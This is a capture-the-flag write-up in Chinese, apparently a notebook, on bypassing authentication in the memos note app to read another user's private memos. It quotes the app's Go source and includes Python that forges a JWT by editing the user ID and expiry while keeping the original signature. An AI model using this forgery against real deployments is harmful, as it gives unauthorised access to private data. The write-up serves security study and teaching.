## ICS笑传之查查表

这道题的解法可谓是八仙过海，各显神通。只要你仔细审计memos源码，注意力足够集中，总有一个0day属于你！

找到API的列表，看看API的权限控制是一个Web题的常见起手。我们先定位到[源码](https://github.com/usememos/memos/blob/f9fec565608f5b4847238d1731ce24885905b1d6/server/router/api/v1/acl_config.go#L3)，看看有那些API是在身份验证不通过时能使用的：

```go
var authenticationAllowlistMethods = map[string]bool{
	"/memos.api.v1.WorkspaceService/GetWorkspaceProfile":          true,
	"/memos.api.v1.WorkspaceSettingService/GetWorkspaceSetting":   true,
	"/memos.api.v1.WorkspaceSettingService/ListWorkspaceSettings": true,
	"/memos.api.v1.IdentityProviderService/GetIdentityProvider":   true,
	"/memos.api.v1.IdentityProviderService/ListIdentityProviders": true,
	"/memos.api.v1.AuthService/GetAuthStatus":                     true,
	"/memos.api.v1.AuthService/SignIn":                            true,
	"/memos.api.v1.AuthService/SignInWithSSO":                     true,
	"/memos.api.v1.AuthService/SignOut":                           true,
	"/memos.api.v1.AuthService/SignUp":                            true,
	"/memos.api.v1.UserService/GetUser":                           true,
	"/memos.api.v1.UserService/GetUserAvatarBinary":               true,
	"/memos.api.v1.UserService/SearchUsers":                       true,
	"/memos.api.v1.MemoService/GetMemo":                           true,
	"/memos.api.v1.MemoService/GetMemoByUid":                      true,
	"/memos.api.v1.MemoService/ListMemos":                         true,
	"/memos.api.v1.MarkdownService/GetLinkMetadata":               true,
	"/memos.api.v1.ResourceService/GetResourceBinary":             true,
	"/memos.api.v1.ResourceService/GetResourceByUid":              true,
}
```

其中`getMemo`, `getMemoByUid`, `ListMemos`都是能返回Memo内容的API。由于它每一个Memo有一个随机ID，而我们不知道目标Memo的随机ID是多少，所以`ListMemos`看上去最可能利用。

ListMemo允许我们传一个CreatorID来筛选Memo，而我们知道目标用户Memo的ID是1。直接在CreatorID传1，可见性选Private，我们是不是就能看到Flag了？

答案是不能。因为在[源码](https://github.com/usememos/memos/blob/f9fec565608f5b4847238d1731ce24885905b1d6/server/router/api/v1/memo_service.go#L871)里做了过滤：

```go
else if find.CreatorID == nil || *find.CreatorID != user.ID {
	// If creator is not specified or the creator is not the current user, only public and protected memos are visible.
	find.VisibilityList = []store.Visibility{store.Public, store.Protected}
}
```

这个`user.ID`是怎么来的？是从jwt里来的。而它在[GetCurrentUser](https://github.com/usememos/memos/blob/f9fec565608f5b4847238d1731ce24885905b1d6/server/router/api/v1/auth_service.go#L294)里并没有校验jwt对不对：

```go
func (s *APIV1Service) GetCurrentUser(ctx context.Context) (*store.User, error) {
	username, ok := ctx.Value(usernameContextKey).(string)
	if !ok {
		return nil, nil
	}
	user, err := s.Store.GetUser(ctx, &store.FindUser{
		Username: &username,
	})
	if err != nil {
		return nil, err
	}
	return user, nil
}
```

而它的[校验](https://github.com/usememos/memos/blob/f9fec565608f5b4847238d1731ce24885905b1d6/server/router/api/v1/acl.go#L57)只会判断jwt认证是否通过，不会特别判断jwt的签名是否正确：

```go
username, err := in.authenticate(ctx, accessToken)
	if err != nil {
		if isUnauthorizeAllowedMethod(serverInfo.FullMethod) {
			return handler(ctx, request)
		}
		return nil, err
	}
```

也就是说，我们可以通过伪造jwt，让memos认为我们是别的用户，然后访问ListMemos！
以下是伪造jwt的代码：

In [1]:
tok = "eyJhbGciOiJIUzI1NiIsImtpZCI6InYxIiwidHlwIjoiSldUIn0.eyJuYW1lIjoiIiwiaXNzIjoibWVtb3MiLCJzdWIiOiIyIiwiYXVkIjpbInVzZXIuYWNjZXNzLXRva2VuIl0sImV4cCI6MTczMDAzOTYzMCwiaWF0IjoxNzI5NDM0ODMwfQ.fxXMT-DF9zij6luv7I8eXDMJBN1vtSt_bOBkMMov-wI"

import base64
_head, _info, _sign = tok.split('.')
base64.b64decode(_info + '==')

b'{"name":"","iss":"memos","sub":"2","aud":["user.access-token"],"exp":1730039630,"iat":1729434830}'

In [2]:
_new_info = base64.b64encode('{"name":"","iss":"memos","sub":"1","aud":["user.access-token"],"exp":4882702126,"iat":1729102126}'.encode('ascii'))
print(_head + '.' + _new_info.decode('ascii').replace('=','') + '.' + _sign)

eyJhbGciOiJIUzI1NiIsImtpZCI6InYxIiwidHlwIjoiSldUIn0.eyJuYW1lIjoiIiwiaXNzIjoibWVtb3MiLCJzdWIiOiIxIiwiYXVkIjpbInVzZXIuYWNjZXNzLXRva2VuIl0sImV4cCI6NDg4MjcwMjEyNiwiaWF0IjoxNzI5MTAyMTI2fQ.fxXMT-DF9zij6luv7I8eXDMJBN1vtSt_bOBkMMov-wI


有点头疼的是它的请求是用GRPC编码的。我懒得解码了，直接在找到前端的`fetchMemos`函数，打个断点，然后刷新，把filter设置为空：

![2024-10-20_223945.png](attachment:2024-10-20_223945.png)